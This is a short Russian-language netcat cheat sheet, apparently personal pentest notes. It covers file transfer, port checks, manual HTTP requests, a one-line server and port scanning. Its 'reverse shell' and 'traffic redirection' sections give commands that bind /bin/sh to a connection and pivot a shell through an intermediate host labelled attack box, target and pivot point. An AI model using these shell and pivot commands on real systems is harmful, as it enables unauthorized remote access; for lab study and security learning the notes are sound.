nc -l -p 1234 > out.file -  слушаем порт 1234
На отправляющей выполняем следующее:

== Открыть порт
nc -knvlp 2222 - без зброса соединения (ключ -k)

=== Проверить открыт ли порт
nc -vn 192.168.1.60 8000

Не работает, надо смотреть:
netcat -z -w5 ya.ru 80
nc -w 3 [destination] 1234 < out.file

Если используем сжатие:

nc -l -p 1234 | uncompress -c | tar xvfp - получить с сжатием

tar cfp - /some/dir | compress -c | nc -w 3 [destination] 1234  - отправить

=== Пишем хедеры для получения странички

nc ya.ru 80
GET /index.html HTTP/1.1
Host: www.ya.ru

=== Статический сервер
nc -l -p 4122 < index.html - поднять сервер


=== Обратный шел
На машине где будут вводиться команды
sudo nc -nvlp 443
На сервере
nc -e /bin/sh 127.0.0.1 443


=== Сканируем порты
nc -vv -z localhost 1-100 > output.txt 2>&1

=== Перенаправление трафика
10.11.1.16 attack box: nc -lvp 4444
10.11.1.96 target host: nc -lvp 4444 -e /bin/sh
10.11.1.250 pivot point: nc -v 10.11.1.16 4444 -e ”nc -v 10.11.1.96 4444”
